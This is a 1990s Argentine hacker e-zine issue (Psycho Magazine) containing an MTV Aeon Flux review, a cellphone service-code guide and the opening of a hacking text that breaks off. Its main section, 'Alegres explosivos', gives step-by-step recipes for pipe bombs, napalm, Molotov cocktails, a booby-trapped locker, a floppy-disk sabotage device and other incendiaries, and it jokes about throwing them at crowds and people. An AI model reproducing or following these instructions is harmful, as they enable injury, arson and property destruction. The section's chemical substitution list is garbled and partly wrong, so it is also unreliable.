
                  ÜÜÛÛÛÛÛÛÛÛÜÜ
               ÜÛÛßßÛÛ     ßßÛÛÜ                       Ş
                ß   ÛÛ       ÜÛÛ                      ŞÛ
                   ŞÛİ     ÜÛÛß                      ŞÛİ
              ÄÄÄÄ ÛÛ Ä ÜÜÛÛß ÄÄÄŞÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
              ÄÄÄÄŞÛÛÜÛÛßß ÜÜÜ ÄÄŞÛÄÄÄÄÛÄÄÄÄÜÜÜÜÛÛÄÄŞÛİÄÜÜÛÛÄÄÄÄÛÛÛÛİÄ
              ÄÄÄ ÛÛÛß Ä ÜÛÛß ÄÄÄÄÛİÄÄÛÄÄÄÜÛßßÄŞÛİÄÄÛÛßßÄŞÛİÄÄÜÛßßÄŞÛİ
              ÜÜßßÛÛ Ä ÜÛßß  ÜÜ ÄÄŞÛÜÛ Ä ÛÛ ÄÄ Ûİ  ŞÛİÄÄ ÛÛ  ÛÛ ÄÄ Ûß
              ÄÄ ŞÛİÄÄ ßÛÜÜßßÛİ ÄÄ ÛÛ ÄÄŞÛİÄÄÄÄÄÄÄ ŞÛ ÄÄŞÛİÄŞÛİÄÄÄŞÛİÄ
              ÄÄ ÛÛ ÄÄÄÄÄÄÄÄŞÛİÄÄÄŞÛİÄÄ ÛÛ ÄÄÄÄÄÄÄ ÛÛ ÄÄŞÛ Ä ÛÛ  ÛÛÛ Ä
                ŞÛİ        ÛÛÛ     ÛÛ   ÛÛÛ        ŞÛİ  ÛÛ    ÛÛÛÛÛ
                ÛÛÛ       ÛÛÛ      ŞÛİ  ŞÛÛÛ     Ş     ŞÛİ
                         ÛÛÛ        ÛÛ   ÛÛÛÛ   ŞÛ           Magazine
                                          ÛÛÛÛİÛÛÛ
                                           ÛÛÛÛÛÛİ


                                P ú S ú Y ú C ú H ú O
                                       MAGAZINE

           A¤o II - Numero 6 - "NACER, COMER, COJER, MATAR, DORMIR, MORIR."


               HEY YOU!!!: Este magazine contiene articulos  y/o
                           comentarios que pueden atentar contra
                           su salud.  ToXiC WASTES y los autores
                           de los articulos aqui transcriptos no
                           se hacen responsables por el da¤o que
                           pudiese llegar a  causar el uso de la
                           siguiente informacion.

 ------------------------------------------------------------------------------
 Ironia?, nah, esculpido en tu cerebro llevas lo mas podrido de vos: VOS MISMO.
 Suerte?, no!, en forma clandestina intentas guardar amor de 10$ en tu corazon.
 Entre paso y paso se suceden miles de cosas. Una de esas cosas sera quiza la 
 causante de tu muerte, mira atento para adelante... pero no descuides el culo
 hay mucha gente que te lo romperia por guita, y otra por placer. NO SABES CUAL
 ES MAS PELIGROSA?.. te digo.. la mas peligrosa es TU clase de gente. la que se
 queda sentada dejando que las cosas tan solo pasen.

 ToXiC WASTES
 ------------------------------------------------------------------------------
 
                                P ú S ú Y ú C ú H ú O
                                       EDITORS
   
                     - Kristo                       - STRaNGeR
                     - Nekromancer                  - JaCK    
                     - Pipa                         - Neon

 ------------------------------------------------------------------------------
     NOTA: Undercover se encuentra momentaneamente fuera de linea. no llamen

                       " UNDERCOVER, el cielo en llamas... "

 ------------------------------------------------------------------------------
 
                                      INDICE 

               .Alegres explosivos by Stranger..................000
               .MTV bujos by Nekromancer........................001
               .MINIPHONE Pocket Guide by Kristo................002
               .TEXTO 2 by Neon.................................003
               .TEXTO 3 by Neon.................................004
               .Trazando el circulo by Jack.....................005
               .Desencriptando las claves del WINSOCK...........006
               .Fucking Bienal by Kristo........................007
               .VISA real numbers! (USE IT!)....................008
               .Bonus File: HORROR GIF........................6.JPG

 ------------------------------------------------------------------------------

                               ToXiC WASTES World HQs

           Undercover (Node1) ....... +54-1-off-LiNE AD 24To07 KRiSTo
           Undercover (Node2) ....... +54-1-off-LiNE AD ú24Hsú KRiSTo
           H.D.P BBS ................ +54-1-w84-ThEM AD 24To07 STRaNGeR

                             ToXiC WASTES Members Boards

           Century XXI .............. +54-1-981-7971 AD 23To07 Pipa 
           The Crypt ................ +54-1-NOT-4YOU AD 24To07 JaCK
           bOIxOs nOIs .............. +54-1-730-HaCK AD ú24Hsú Nekromancer
           Kadima ................... +9-72-2-OUT!!! AD 07To24 Neon

                              ToXiC WASTES Distro Sites

           SaTaNiC BRaiN ............ +54-1-382-7480 AD ú24Hsú AZRAEL
           Trucho Soft .............. +54-1-299-2619 AD 00To07 THe_CRoW

                          PSYCHO Magazine USA Distro Site

           The Great Escape ........ +1-305-581-3355 AD ú24Hsú Larry

                              PSYCHO Magazine FTP Site

           Ftp.eff.org .............. /VERY/soon~!...

                        PSYCHO Magazine Local Distro Sites

           Almuerzo Desnudo ......... +54-1-635-1269 AD ú24Hsú Na7AS
           Heroes Derrotados ........ +54-1-305-9633 AD 24To06 Chacal
           Hollyland ................ +54-1-oFF-line AD 23To07 Zebra
           Masacre Brutal ........... +54-1-774-1130 AD 23To07 D.Darrell
           Twilight Zone ............ +54-1-768-8639 AD 23To07 Satan Klauz
           Shadows Knights .......... +54-1-362-3753 AD 24To05 Lord Vasniak
           Black Sect ............... +54-1-302-5537 AD 23To06 Cromos
           Anda-K-Gar! .............. +54-1-503-5292 AD ú24Hsú Aiz Kiub
           Angel Dust ............... +54-1-584-0032 AD 23To07 Wiz
           Cyber Daemon ............. +54-1-230-8566 AD 24To06 Luther King
           Exodo .................... +54-1-911-2503 AD 00To07 Spektor
           Dr.Jekill ................ +54-1-302-7403 AD 00To06 Dr.Jekill
           Nuclear Zone ............. +54-1-ask-mami AD ú24Hsú Predator
           Fill the form out !!! .... +!!-!-!!!-!!!! !! !!!!!! You !!!

                                    E-Mail(s) to:

                             tw_staff@jekill.psico.net

 ------------------------------------------------------------------------------

                               " Alegres Explosivos "
                                -=-=-=-=-=-=-=-=-=-=-



bueno .......hoy estoy inspirado a si que me dedico a escribir...y para
que esten felices y cumplan con su mision como siempre unas formas de hacer
tu propio proyecto:"terrorista" jejejejje .....
esta informacion es solo para educacion (ignorantes hijos de la gran puta!)...
yo ni nadie de toxic wastes se hace/n responsable/s del uso o da¤o que esto
llegara a causar (o te cause) como haci tampoco de lo pelotudo que seas jejeje.
Clarito: "NO SE ACEPTAN RECLAMOS" jajajaja ...



Empezamos.......(el indice que sigue es al solo fin de orientarlos....por el 
buen camino ...jejejej ..)


1)  La bomba del tubo
2)  Napalm
3)  Variaciones familiares de productos qu¡micos £tiles
4)  El coctail Molotov
5)  La bomba de la pelota de tenis
6)  La bomba del disquet
7)  Bomba de humo del casillero de secundaria (u otro je!)
8)  La bomba de humo
9)  La bomba de la botella



* 1)

 La bomba del tubo
--------------------

La Bomba del tubo es una herramienta com£n del anarquista moderno.
Es simplemente un tubo lleno de material explosivo y tapado por ambos
extremos.
se recomienda mucho cuidado ...(estoy sentimental :) ...) bah...
*MUCHO* cuidado...


Hay dos versiones de la bomba del tubo que parece estar favorecido por
la mayor¡a de los anarquistas.

La cabeza de f¢sforo y la p¢lvora. Describir‚ ambos.

- Cabeza de f¢sforo

Esta parece ser la versi¢n m s popular entre la juventud de hoy.
Esto puede ser porque es menos peligroso y algunos disfrutan el uso de
todos sus miembros. jejeje
Se hace tomando simplemente un tubo con tapa a rosca en cada extremo y
llenandolo con cabezas de f¢sforos.
Preferiblemente aquellas que se encienden a golpearlas con cualquier cosa.
Aunque cortar las cabezas de f¢sforos puede ser un trabajo largo..
no te quejes  ..jejjeje hacelo con un amigo ..(vos en cuatro jajajajaj) ....
Una vez que se ha llenado el tubo, cuidadosamente se lo cierra por ambos
extremos.
Mientras mayor sea su tubo, m s destructivo ser .
Taladre un agujero en una tapa e inserte la mecha (sugiero algo que arda
lento). Estas bombas son destructoras y RUIDOSAS.
Si detonara en un  rea cerrada, puede ocasionar la p‚rdida de audici¢n.
Si detonara cerca de gente (muchedumbre ejejjeje) ...exacto DESTRUCTORAS Y 
RUIDOSAS !.........

opcion 2:

-- P¢lvora

Basicamente el mismo concepto, excepto que el tubo est  lleno con p¢lvora de
balas o cohetes (se recomienda la de las balas) la verdad lo mejor es usar
polvora negra (bien pura) la mejor ! jejeje en lugar de cabezas de f¢sforos.
Este es m s destructor en general, pero incre¡blemente peligroso.
Tenga EXTREMA cautela cuando enrosque las tapas al final.
Frecuentemente granos peque¤os de p¢lvora seran atrapados en la rosca, y cuando
usted enrosque ... ya se habr  imaginado lo que ocurre.
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
      Explicacion para el que no tiene imaginacion o es un gran boludo..
   es sensillo las piedritas de la polvora se quedan en la rosca al atornillar
no es joda ..se produce una chispa y BOOM ...y vas derecho a la tumba je!
en serio ........conozco gente que por poco pierde la vista ...a si
que ya saben ........NO ME HAGO RESPONSABLE !!!!!!!! 
Sugiero limpiar cuidadosamente con un trapo humedo antes de enroscar el
tubo. ahora ven por que lo del cuidado ...? :)

                    -------------------------------------

* 2)

                                
 Napalm
--------

Muchos de ustedes han sabido del Napalm y habr n pensado en alguna mezcla
altamente explosiva de productos qu¡micos. Esto es completamente falso.

Napalm es simplemente una parte de jab¢n y una parte de gasolina.

El jab¢n tiene que ser una barra picada de jab¢n o pedacitos de jab¢n.
Los detergentes no sirven. ¨ C¢mo se hace ?

Tome un ba¤o maria y ll‚nelo con agua. Hierva el agua y vaya a un lugar
abierto sin peligros de llamas.
A¤ada la gasolina en la parte superior y a¤ada jab¢n y remu‚valo hasta
que est‚ espeso.
ahora tiene una de las mejores bombas de fuego de todos los
alrededores. 
Deber¡a ser un espeso gel como sustancia.
Es altamente inflamable, as¡ que no recomiendo ponerlo cerca de una llama.

                        ------------------------


* 3)

 Las versiones familiares de productos qu¡micos £tiles
--------------------------------------------------------

Algunos de ustedes ha visto tipos de archivos a cerca de la bomba de
plutonio .

Bien, ‚sta guia deber¡a ayudarlo, dandole sustituciones familiares de
estos productos qu¡micos necesitados. 
 
Es una lista bastante completa :

Acido ac‚tico                   Vinagre
Oxido de aluminio               Aluminio
Potasio de Aluminio             Aluminio
Aluminum Sulfate                Aluminio
Hidroxido de aluminio           Ammoniaco
Carbon Carbonico                Tiza
Cloridrato de carbon            Liquido de Lipieza
Calcio de Oxido                 Limaduras
Calcio de Sulfato               Yeso
Acido Carbonico                 Agua de Seltz
Oxido Ferrico                   Ca¤o Oxidado
Glucosa                         Almibar
Graphito                        Mina de Lapiz
Acido Hydrocloridico            Acido Muriatico 
Hydrogeno de Peroxido           Peroxido
Acetato                         Azucar
Silicato de Magnesio            Talco
Nitrato De sodio o potacio      Salitre
Naphtalina                      Bolitas de Naftalina
Dioxido de sodio                Arena
Bicarbonato de sodio            Soda o bicarbonato
Carbonato De sodio              Soda
Cloruro de sodio                Sal
Hidroxido de sodio              Lejia
Clorato de zinc                 Tinner

                    -------------------------------------

* 4)

 El Cocktail Molotov
---------------------

Uno de los explosivos m s usados fue dise¤ado por el anarquista Molotov.

Es generalmente una botella llena de gasolina con una mecha combustible en la
boca de la botella.
El cocktail original, y en mi opini¢n, la mejor, fue una mezcla de 1 parte de
gasolina y 1 de aceite de motor.
La gasolina es obviamente la que ocasiona el fuego, y el aceite motr¡z ayuda
a adherir el fuego a cualquiera superficie.

Hay, sin embargo, otras variaciones algunas son estas.

Una mezcla de brea y gasolina.
Otra bomba de fuego se ha creado con cera derretida derramada en una botella
de gasolina.

Esto es, como  podes imaginar, bastante doloroso si cayera encima de alguien
 o de mucha gente ...jejejeje ...   

Se deben lanzar tan pronto como pueda, debido a que no querr s estar
sosteniendo uno de estos cuando explota. jejejejjeje

                       -----------------------------


* 5)


 La bomba de la pelota de tenis
--------------------------------

Otra simple. 
 
Esta es construida tomando primero una pelota de tenis simple, y taladrando
un agujero en ella.
Entonces se obtienen aquellos f¢sforos con que golpean en cualquier parte y
se cortan las cabezas, poni‚ndolas en el agujero.
Cuando la bola se completa se la lanza  a algo y no har  una explosi¢n
GRANDE pero asustar  a  alguien ...
Si se quisiera aumentar el tama¤o de su explosi¢n y el fuego, mezcle
gasolina con los f¢sforos. jjejeje ..

Este es un lindo explosivo para ir empezando ... ;) ...

                      ------------------------------


* 6)

 La bomba del disquet
----------------------


Un excelente m‚todo de obtener venganza en una computadora de alg£n ex-amigo
es bombardear la disquetera para que vea que no solo le mandamos virus! jeje!

Esta es una bomba simple para hacer, y muy segura.

Primero, obtenga un cuchillo y corte la solapa del disco que est  sellado con
goma de modo que se pueda sacar el disco floppy real. 
Toma despu‚s una taza y pon‚ un poco de Removedor para pulir en ella.
Entonces tom  los f¢sforos, cortale las cabezas y mezclalas con el Removedor.
Mezclar hasta obtener una especie de fango.
Tom  la mezcla y frotalo sobre el disco floppy (el disco real con la
informaci¢n en ‚l).<------el disco redondo ( cinta)!!! GIL!
Aseg£rese que no se vea a trav‚s de cualquiera de los agujeros.
Re-sellar el disco.
Ahora ponelo entre dos libros muy pesados toda la noche.
Cuando te levantes por la ma¤ana  tendr s una bomba de disco
completamente funcional. 
El girar de las cabezas contra el f¢sforo provocar  una chispa, alumbrara el
polvo removedor, y da¤ar  con el tiempo el drive.

                         -------------------------------


* 7)

 La bomba de humo del casillero de secundaria
----------------------------------------------


Este es realmente agradable.  He aqu¡ una lista de los materiales que se
necesitar n para este proyecto.

1) 1 bomba de humo (explicacion posterior).
2) 1 Cohete Modelo Ignitor. Usted puede obtenerlo en la Tienda de su Hobby
favorito ;)
3) 1 pila. 
4) 1 Alambre.
5) 1 Interruptor inverso (cuando esta para adentro = off, para afuera = on)
6) Sujetadores tipo cocodrilo.


                               Sujetadores = #
B                                     |
o                                     v       Mecha
t --> 0---\                                     |
¢      \   \                         /#         |
n       \___\______________________/   ``       v
       /     /                     \     ````` ----|||||
      +    -           ^             \# ``         |   |
     ||||||||          |                  ^        |   |
     |Pila             |                  |        |||||
     |                 |                  |          ^
     |      |       Alambre       Cohete Ignitor     |
     ||||||||                                        |
                                                  Bomba de humo

espero se entienda ...


Bien, comenzare la explicaci¢n.

Lo que se debe hacer es colocar el bot¢n de modo que este contra la puerta
cerrada.  Cuando la puerta se abra, el bot¢n se hundir , la corriente pasar 
y encender  el Cohete Ignitor, ‚ste calienta la mecha, y su bomba de humo
estallar  !!!.

Voila.

Si se odiara realmente al tipo, haga que el cohete encienda una bomba de 
estruendo en lugar de una bomba de humo.


Nota:

Sirve para cualquier especie de gabinete o casillero o algo que se les ocurra
que pueda ir...

                     --------------------------------

                                
* 8)

 La Bomba de Humo
------------------

Esta secci¢n le dir  como hacer una bomba de humo b sica.
Es lindo, simple e incre¡blemente segura.

4 partes de az£car se mezcla con 6 partes de nitrato de potasio (salitre) y
se lo derrite bajo una llama removi‚ndolo.
Antes de que se endurezca  poner algunas cabezas de f¢sforo como mecha.

Una libra llenar  un cuarto completo con humo blanco. ;)


                          ---------------------------

* 9)
                                
 La Bomba de la Botella 
------------------------

Esta es una bomba f cil para hacer, y un de las m s utilizadas y efectivas.
Lo qu‚ se necesita:

1) Botella de vidrio
2) Gasolina
3) Potasio permangante

Tome su botella y ll‚nela con gotas de gasolina.
Ahora se cubre por fuera de la botella y enrolle alrededor de ‚sta de modo que
el gas se evapore por los lados..

Ahora a¤ada algunos gotas del potasio permangante (cuando digo algunos,
significa tres o cuatro). Esta bomba puede detonar simplemente arroj ndola
contra un objeto s¢lido (una pared, un auto, la cabeza de alguien ;), etc..).

                   -------------------------------------

ya esta ...espero que se entretegan y lo que realmente ..vale la pena ...
piensen seriamente ..en un lindo proyecto para ....seguir saludando a estas
sociedades paranoicas ....jejejejejjejje ..........


byebyebyebyebyebye sossssoooooooooooo


                                  
                     STRaNGeR / TWG / [Terror-istGROUP]




Gretts to: Kristo/Nekromancer/pipa/jack ...and all friends ...





                                            
                           CALL THIS BOARDS:



                  R  E   A   D       I   N   F   O   !!!!!!!










hehehehe pd:

eejejjeje ......que asco las solicitadas de microshit y bostalegal....!
muerte a estos hijos de puta.....en prox...numeros....prometo pasar 
direccion, telefonos , nombres etc etc, de esta sociedad del orto.......
'por que los millones de dolares en pirateria van a ser invertidos en 
tecnologia y desarrollo de software....'manga de chorros .....!!!! ....
'prevengase use solo software legal ....por los virus..y la concha de la reputa
madre que te pario ......miscrosoft chorros de mierda .......como si lo que 
facturan a los ro¤osos no les alcazara .....150$ por win 95 ....os/2 warp sale
60$ ....y es millones de veces superior ..........bueno ya saben .......nada 
de hacer boludeces ...de comprar originales ....muerte a esos hijos de puta...
larga vida a la pirateria....final frontier volve .....fucking utilities 
seras millones....! ;) ................ya saben ......no te dejes enga¤ar ...
nadie te domina. ............................



                             STRaNGeR / TWG 




Read Psycho Magazine ......

La ambigua heroina del comic de MTV.


AEON FLUX, con un pasado para armar.


El rock y los dibujos animados no son territorios ajenos.

Desde el fundante "yellow submarine", la delirante incursion de

los Beatles, hasta el zafado Gato Fritz y las partes animadas de

The Wall, los caminos se han tocado. Los dibujitos, tradicionalmente

dedicados a los nenes, son hoy un vehiculo mas de expresion en

este fin de siglo que nos toca vivir.


Y la MTV, el omnipresente canal musical de cable no se mantuvo ajeno

a estos avatares. Despues del exito de Beavis and Butthead, han

lanzado ahora Aeon Flux. Una guerrera del tercer milenio que combina

una agresiva seduccion con una aun mas violenta capacidad de

ataque y defensa.


La historia, indispensable para comprender los capitulos unitarios

que desde el pasado 17 se emiten en la MTV latina los miercoles a

las 23 y los domingos a las 21, se completa con un libro editado

por MTV books.


Alli se encuentran las claves de esta historia que merece ser

contada por nekromancer.


Lo que llega a nuestras manos, entonces, es una parte del archivo

de Trevor Goodchild, temible dictador de un hipotetico y futuro

pais, Bregna.


La senial de alerta de Goodchild se enciende cuando descubre el

accionar de un grupo subversivo, el movimiento por la reunificacion

de Berognican (MRB). El panfleto que lee dice otra verdad que la

que cuenta la historia oficial, y cualquier parecido con la actualidad

corre por cuenta del espectador. En un tiempo Bregna estaba unida

a Monica, su pais vecino, hasta que una pared fue construida entre

los dos paises, separando barrios y familias. Desde entonces

Bregna, cambio paz por guerra, amor por odio e invento otra historia

donde aquel pasado no tuvo jamas existencia.


Los dichos que Goodchild vuelca en su primer informe confidencial y

ultrasecreto son por demas elocuentes: "La historia es mia, lo que

vendra y tambien lo que fue. No solo quiero crear un futuro ideal,

tambien debo preservar el pasado, la historia. Esta no puede caer

en manos extranias".


Claro que no es esto lo que trasmitira ni a su pueblo ni a sus

subordinados. El final de su segundo informe concluye en forma

elocuente: "El BRM dice la verdad. La verdad es peligrosa. La

verdad debe ser borrada".


Claro que lo que circulara es otra version, mediante una simple

sustitucion: donde dice verdad, lease mentira. La historia

un juego para armar.


Para contrarestar, para defender la historia ficticia, se planea una

operacion ultraconfidencial, Euphemia.


Y para ejecutarlo se buscara a espias profesionales. De los muchos

propuestos, entre los que hay un experto en explosivos, un cazador

de fotografos, una impresionante gorda capaz de contrabandear todo

lo imaginable se elige a Aeon Flux para la tarea de exterminio

del BRM.


Una mujer peligrosisima, espia y asesina profesional, de cuyos

metodos no se sabe demasiado pero si de su eficacia. Una

independiente, mercenaria profesional, pero que en su accionar

provocara impensables desenlaces, sobre todo para Goodchild.



pd: Un enorme saludo a la "elite" argentina y a los international

    callers por su incondicional respaldo a "Boixos Nois" bbs.

    Scavenger thnxs for your knowledge gived to nekromancer.
 



          
           %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
           %%%%%%                                                  %%%%%
           %%%%%%         M I N I P H O N E ú Pocket Guide         %%%%%
           %%%%%%                                                  %%%%%
           %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


 lA sIGUIENTE eS uNA cOPIA fIEL dE lA gUIA dE bOLSILLO dE lOS tELEFONOS 
 cELULARES cON lINEA mINIPHONE...


 - ^CONSULTAS A MINIPHONE^ ----------------------------------------------------

 Para cualquier consulta sobre el servicio de Miniphone usted puede recurrir
 a los siguientes telefonos.

 - ATENCION AL CLIENTE LAS 24HS.                    * +111 +SND o 470-9980 +SND
 - PREGUNTAS SOBRE FACTURACION                      * +112 +SND o 470-9950 +SND
 - SERVICIO TECNICO                                  * +99 +SND o 470-9960 +SND
 - SERVICIO AUTOMATIZADO DE AYUDA                                   * +211 +SND

 - ^TRANSFERENCIA INMEDIATA^ --------------------------------------------------

 Transfiere las llamadas entrantes automaticamente a cualquier numero 
 previamente designado por usted.

 - SE ACTIVA CON                                  * +711 +NUMERO DESIGNADO +SND
 - SE DESACTIVA CON                                                 * +713 +SND

 - ^LLAMADA EN ESPERA^ --------------------------------------------------------

 Permite retener una llamada en curso mientras contesta una segunda llamada
 entrante y alternar entre ambas.

 - TOMAR SEGUNDA LLAMADA, RETENIENDO LLAMADA EN CURSO                    2 +SND
 - CAMBIO ALTERNATIVO ENTRE LLAMADAS                                     2 +SND
 - CORTAR LLAMADA EN CURSO TOMANDO LA QUE ESTA EN ESPERA                 1 +SND

 - ^LLAMADA DE CONSULTA^ ------------------------------------------------------

 Reteniendo una comunicacion en curso, usted puede realizar otra llamada.

 - RETENER LA LLAMADA EN CURSO Y REALIZAR LA SEGUNDA LLAMADA        NUMERO +SND
 - CAMBIO ALTERNATIVO ENTRE LLAMADAS                                     2 +SND
 - CORTAR LLAMADA EN CURSO TOMANDO LA QUE ESTA EN ESPERA                 1 +SND

 - ^LLAMADA DE CONSULTA CON TRANSFERENCIA^ ------------------------------------

 Transfiere la llamada original al abonado que se encuentra en espera.

 - RETENER LA LLAMADA EN CURSO Y REALIZAR LA SEGUNDA LLAMADA        NUMERO +SND
 - CAMBIO ALTERNATIVO ENTRE LLAMADAS                                     2 +SND
 - EFECTUAR TRANSFERENCIA                                                4 +SND

 - ^CONFERENCIA TRIPARTITA^ ---------------------------------------------------

 Una vez establecidas dos comunicaciones, ya sea mediante Llamada en Espera o
 Llamada de Consulta, usted puede mantener una comunicacion simultanea entre 
 tres participantes.

 - ESTABLECER CONFERENCIA                                                3 +SND

 - ^CONFERENCIA TRIPARTITA CON TRANSFERENCIA^ ---------------------------------

 Agrega a la Conferencia Tripartita la posibilidad de retirarse de la misma,
 mientras los otros dos participantes continuan con la comunicacion.

 - ESTABLECER CONFERENCIA                                                4 +SND

 - ^RESTRICCION DE LLAMADAS SALIENTES^ ----------------------------------------

 Mediante un codigo de seguridad puede restringir las llamadas salientes.

 - SE ACTIVA CON                                    * +751 +CODIGO DE SEGURIDAD
 - SE DESACTIVA CON                                 * +753 +CODIGO DE SEGURIDAD
 - SE INTERROGA CON                                 * +752 +CODIGO DE SEGURIDAD

 - ^TRANSFERENCIA CUANDO NO CONTESTA^ -----------------------------------------

 Si no cuenta con C.E.M. puede derivar las llamadas entrantes que usted no 
 conteste a un numero designado.

 - SE ACTIVA CON                                  * +721 +NUMERO DESIGNADO +SND
 - SE DESACTIVA CON                                                 * +723 +SND
 - SE INTERROGA CON                               * +722 +NUMERO DESIGNADO +SND

 - ^CASILLA ELECTRONICA DE MENSAJES (C.E.M.)^ ---------------------------------

 La C.E.M. recibira los llamados no respondidos, dandole la posibilidad de
 recuperarlos cuando le resulte conveniente.

 - INGRESO A LA C.E.M. DESDE SU MINIPHONE                           * +555 +SND
 - SE ACTIVA CON                                                    * +511 +SND
 - SE DESACTIVA CON                                                 * +513 +SND
 - INGRESO A LA C.E.M. DESDE UN TELEFONO CONVENCIONAL DE TONOS         472-0000

 - ^EMERGENCIAS (LLAMADAS SIN CARGO)^ -----------------------------------------

 - BOMBEROS                                                            100 +SND
 - COMANDO RADIOELECTRICO                                              101 +SND
 - C.I.P.E.C.                                                          107 +SND
 - INSTITUTO DEL QUEMADO                                          923-3022 +SND
 - CENTRO DE ASISTENCIA AL SUICIDA                                962-0303 +SND
 - TOXICOLOGIA                                                    962-6666 +SND
 - ESCAPES DE GAS                                                 982-7051 +SND

 - ^ACCESOS DIRECTOS^ ---------------------------------------------------------

 - RADIO TAXI                                                       * +360 +SND
 - REMISES                                                          * +370 +SND
 - ALQUILER DE AUTOS                                                * +380 +SND
 - AUXILIO MECANICO A.C.A.                                          * +444 +SND
 - AUXILIO NAUTICO A.C.A.                                           * +888 +SND

 - ^BANCO DE INFORMACION AUTOMATIZADA^ ----------------------------------------

 Le permite obtener la mas variada y completa informacion financiera y bursatil
 horarios de vuelos, estado del tiempo, farmacias de turno y muchos otros datos
 de utilidad, durante las 24 horas del dia y los 365 dias del a¤o.

 - INGRESO AL B.I.A.                                                * +210 +SND

 ------------------------------------------------------------------ ^THE END^ -

 eSPERO qUE lES sEA de uTILiDaD.

                                                                        kristo.

 ------------------------------------------------------------------------------
  ÜÜ²     ÜÜİ   ÜÜ² ßß²²ÜÜ    ÜÜ² ßß²²ÜÜ    ÜÜ²   ÜÜ² ßÛÜÛß²²ÜÜ    ÜÜ² ßß²²ÜÜ
ßÛÛ²±   ßÛ²±° ßÛÛ²±    ²²±° ßÛÛ²±    ²²±° ßÛÛ²± ßÛÛ²±  Ş²İ  ²²±° ßÛÛ²±    ²²±°
 Û²±°    Ş²±°  Û²±°    Ş²±°İ Û²±°    Ş²±°İ Û²±°  Û²±°   ±   Ş²±°İ Û²±°    Ş²±°İ
 Ş±°İ    ²±°İ  Ş±°İ     ±± ° Ş±°İ     ±± ° Ş±°İ  Ş±°İ   °    ±± ° Ş±°İ     ±± °
 Ş° İ  Ü²° ß   Ş° İ     ±° ° Ş° İ     ±° ° Ş° İ  Ş° İ        ±° ° Ş° İ     ±° °
 Ş °İßßÛ±ÜÜ    Ş °İ ßßßß° °± Ş °İ     ° °± Ş °İ  Ş °İ        ° °± Ş °İ ßßßß° °±
  °±    ß °±Ü   °±      ° °±  °±      ° °±  °±    °±         ° °±  °±      ° °±
  ±²     Ş °±İ  ±²     Ş °±²  ±²     Ş °±İ  ±²    ±²        Ş °±²  ±²     Ş °±²
  Şİ    Ü° °±²  Şİ    Ü° °±²  Şİ    Ü° °²   Şİ    Şİ       Ü° °±²  Şİ    Ü° °±²
  Şİ  Ü²° °±²İ  Şİ  Ü²° °±²İ  ŞİÜÜÛ²°°ßß    Şİ    Şİ     Ü²° °±²İ  Şİ  Ü²° °±²İ
       ß°°±²Û        ß°°±²Û                               ß°°±²Û        ß°°±²Û
         ßÛß           ßÛß                                  ßÛß           ßÛß



Especial para:

                  ÜÜÛÛÛÛÛÛÛÛÜÜ
               ÜÛÛßßÛÛ     ßßÛÛÜ                       Ş
                ß   ÛÛ       ÜÛÛ                      ŞÛ
                   ŞÛİ     ÜÛÛß                      ŞÛİ
              ÄÄÄÄ ÛÛ Ä ÜÜÛÛß ÄÄÄŞÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
              ÄÄÄÄŞÛÛÜÛÛßß ÜÜÜ ÄÄŞÛÄÄÄÄÛÄÄÄÄÜÜÜÜÛÛÄÄŞÛİÄÜÜÛÛÄÄÄÄÛÛÛÛİÄ
              ÄÄÄ ÛÛÛß Ä ÜÛÛß ÄÄÄÄÛİÄÄÛÄÄÄÜÛßßÄŞÛİÄÄÛÛßßÄŞÛİÄÄÜÛßßÄŞÛİ
              ÜÜßßÛÛ Ä ÜÛßß  ÜÜ ÄÄŞÛÜÛ Ä ÛÛ ÄÄ Ûİ  ŞÛİÄÄ ÛÛ  ÛÛ ÄÄ Ûß
              ÄÄ ŞÛİÄÄ ßÛÜÜßßÛİ ÄÄ ÛÛ ÄÄŞÛİÄÄÄÄÄÄÄ ŞÛ ÄÄŞÛİÄŞÛİÄÄÄŞÛİÄ
              ÄÄ ÛÛ ÄÄÄÄÄÄÄÄŞÛİÄÄÄŞÛİÄÄ ÛÛ ÄÄÄÄÄÄÄ ÛÛ ÄÄŞÛ Ä ÛÛ  ÛÛÛ Ä
                ŞÛİ        ÛÛÛ     ÛÛ   ÛÛÛ        ŞÛİ  ÛÛ    ÛÛÛÛÛ
                ÛÛÛ       ÛÛÛ      ŞÛİ  ŞÛÛÛ     Ş     ŞÛİ
                         ÛÛÛ        ÛÛ   ÛÛÛÛ   ŞÛ           Magazine
                                          ÛÛÛÛİÛÛÛ
                                           ÛÛÛÛÛÛİ


                                P ú S ú Y ú C ú H ú O
                                       MAGAZINE

por:
         ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
         ³       Hacking the world       ³     Desde Israel para 
         ³ ²ÛÛÛßßÛ ²ÛÛÛßÛ ²ÛÛÛßÛ ²ÛÛÛßßÛ ³     el resto del mundo
         ³ ±ÛÛÛ  Û ±ÛÛÛÜ  ±ÛÛÛ Û ±ÛÛÛ  Û ³     conectado//
         ³ ÛÛÛÛ  Û ÛÛÛÛÜÜ ÛÛÛÛÜÛ ÛÛÛÛ  Û ³
         ³     Freedom in cyberspace     ³
         ³    Freedom  of information    ³
         ³  Free Ron Arad Hacking Group  ³
         ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Flashing pictures on my screen, show to quickly to be seen, does not register
in my conscious mind, propaganda of another kind. They fuckin'with me
subliminally...
                    MIKE MUIR, SUICIDAL TENDENCIES.

texto nro 2.

Indice:
        1- Armas
        2- Hacking
        3- Programming page
        4- Literatura
        5- Aclaraciones varias



                      "A virus is a virus!"

- Nobel laureate Andre Lwoff's answer on the question "What is a virus?"
  (1959.) -




1- Armas
////////



                        The Virus Syllogism:

                  Computers are made to run programs.
                Computer viruses are computer programs.
         Therefore, computers are made to run computer viruses.




2- Hacking
//////////

Antes que nada el autor, yo, no se hace responsable si un pedazo de imbecil
pone en practica lo aca enseniado y le sale mal....
Hoy... "que hacemos una vez que estamos dentro del sistema?"
Bueno primero que nada debemos decir que hay muchas razones por la que un
